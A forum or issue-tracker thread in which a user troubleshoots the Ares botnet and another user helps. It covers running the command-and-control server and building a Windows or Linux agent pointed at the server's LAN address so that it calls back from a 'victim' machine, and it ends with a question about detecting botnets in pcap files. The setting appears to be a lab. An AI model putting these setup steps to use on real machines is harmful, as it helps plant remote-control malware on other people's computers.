Ares: Modify server IP address

[ghost]

I want to use Ares tool but I find some problems that's why I'm writing to you.

I want to configure my ip server to somethings like 192.168.1.x in my linux machine and put my agent my windows machine (physicaly separated)

when I do

./ares.py runserver -h 192.168.1.x -p 8080 --threade it does not work

Any help please ?

Thanks in advance.

[ghost]

No idea ?

[target111]

How do you run the agent? And is it on a separate network?

[ghost]

Sorry for the delay. I had a problem with my machines and were unable to give you the right response.

I think that the problem is in the run of the agent. Both server and agent are in the same network

server is in a machine with ip: 192.168.1.201 (on Linux) and agent in a achine with ip 192.168.1.2 (on Windows)

I run the server like that ./ares.py runserver -h 0.0.0.0 -p 8082 --threaded

Then I modify the agent config by putting localhost:8082 in the config.py (in the first line)

Then I did :

cd agent ./agent.py ./builder.py -p Windows --server http://localhost:8080 -o agent.exe

Then I retrieved the agent.exe file and executed it on windows machine

And Finally, I go back to linux to refresh my server page but I got no agent in the agent list.

Please any help

[target111]

Replace localhost:8080 with 192.168.1.201:8082(your server address) in the builder.py line and it should work.

[ghost]

I kept the same adress localhost:8080 for server running and for agent. I succeded to run the server and get my agent.exe with :

./builder.py -p Windows --server http://localhost:8080 -o agent.exe

But when I run my agent.exe on the victim machine which is a windows machine, I didnt see my agent in the agent list on my attacker machine (Linux). I dont know why ?

Also When I did :

cd agent ./agent.py

I got this message:
Persistence only supported on compiled agents.

Is it normal ?

Thanks in advance for your reponse please.

[target111]

Yes the persistence bit is normal.

Second: Server is fine. The reason you don't see the agent connect to the server when you run the exe on another machine is because you're not using the correct IP when you compile it. You need to change the builder.py line to this for it to actually work:

./builder.py -p Windows --server http://192.168.1.201:8082 -o agent.exe

The reason why is because you need to have the same IP address as the server and the same port.

[ghost]

Even though, the server is running on 0.0.0.0 : 8080 I have to compile the agent with : ./builder.py -p Windows --server http://192.168.1.201:8080 -o agent.exe ?

Another question please, should I modify the ip adress in builder.py also (i mean put 192.168.1.201 : 8080 instead of localhost : 8080 ) ?

[target111]

Yep, that's correct, in the builder.py you need to use the servers IPv4 address, not localhost which is only accessible from the same machine. 0.0.0.0 means all IPv4 addresses on the local machine. If a host has two IP addresses, 192.168.1.1 and 10.1.2.1, and a server running on the host listens on 0.0.0.0, it will be reachable at both of those IPs.

[ghost]

Firstly thank you so much for your help. I have always the problem. Well I will summarize all what I did, maybe you can tell me what escapes me: after launching the server with :

./ares.py runserver -h 0.0.0.0 -p 8080 --threade

I modified the ip adresse in config.py by putting 192.168.1.201:8080

Then I compiled the agent with: ./agent.py Then I build the agent with: ./builder.py -p Windows --server http://192.168.1.201:8080 -o agent.exe

Then I sent the agent.exe file to the victim machine and run it on this later Then I came back to my attacker machine, I refreshed the server page web But I didn't find the my victim machine in the agent list .

are my steps right please ? Thanks in advance

[target111]

All looks good, are the server and victim computer on the same network? Maybe check if the servers IP hasn't change or check for a firewall.

[ghost]

Yes. Both victim and attacker machines are in the same network. Victim machine ip is 192.168.1.2 and the attacker machine ip is 192.168.1.201 Server IP hasn't changed and The firewalls are disables on both machines (see the attached files)

[ghost]

Hi, Since in windows OS, I get a pb with Ares Bonet, I test it now on linux machine so, I did the same steps as for windows machine except for building agent where I execute this command: ./builder.py -p Linux --server http://192.168.1.201:8080 -o agent

But the pb is when I run the agent on the victim machine with these commands:

sudo chmod +x agent ./agent I got this error message;

Segmentation error.

Do you have any idea abot the origin of this error please ?

[ghost]

Hi Sir,

Please I have a question. Ares botnet works now in my machine and I need to know if there is a way or some element which can help me to detect the presence of a botnet from my traffic network file (pcap file) ? Thank in advance for your help